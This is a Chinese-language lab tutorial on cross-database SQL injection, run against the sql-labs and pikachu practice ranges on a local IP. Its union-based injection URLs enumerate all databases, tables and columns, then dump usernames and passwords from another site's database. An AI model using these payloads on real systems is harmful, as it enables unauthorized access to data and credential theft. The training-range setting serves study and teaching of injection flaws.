1.SQL注入—跨库注入
1.1.前言
??该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。
1.2.跨库注入介绍
??跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。
??简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入。
2.跨库注入
2.1.跨库注入准备
??这里我们采用联合注入方式进行演示,其它的注入方式都是一样的操作,前提是需要拥有管理员权限。
??同时采用sql-labs靶场来演示,sql-labs靶场安装可以参考以下链接。
2.2.跨库注入流程
??这里前期寻找注入点什么时候都不说了,直接判断并进行测试。
2.2.1.判断是否为管理员权限
??可以看到这里是为root权限,而且当前网站的数据库是security,那么我们该如何进行跨库注入,不过这里我们已经获取到的是管理员权限,那么我们就已经完成了前置条件了。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,user(),database()--+
2.2.2.获取数据库下所有库
??这里我们就使用information_schema.schemata获取所有的数据库名,由于在Mysql>5.0版本的时候都会将所有库、所有表、所有列都会放在一张统一的表中,具体的原因还需要去了解数据库,这里我也过多的解释,我们看如何使用即可。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
2.2.3.获取pikachu下的表
??这里我们可以看到,获取到了pikachu数据库,那么我们就读取pikachu数据库下的表。
??需要注意并不是读sql-labs的数据库哦,sql-labs数据库名叫security,而pikachu数据库是pikachu靶场的数据库哦,来实现跨库注入。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pikachu'--+
2.2.4.获取pikachu表中列
??这里我们获取pikachu中的users表走的列。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='pikachu'--+
2.2.5.获取pikachu列中数据
??这里需要注意,先写数据库名,如何在写数据库表名,例如:数据库名.数据库表名。
命令:http://192.168.10.150/sql-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users--+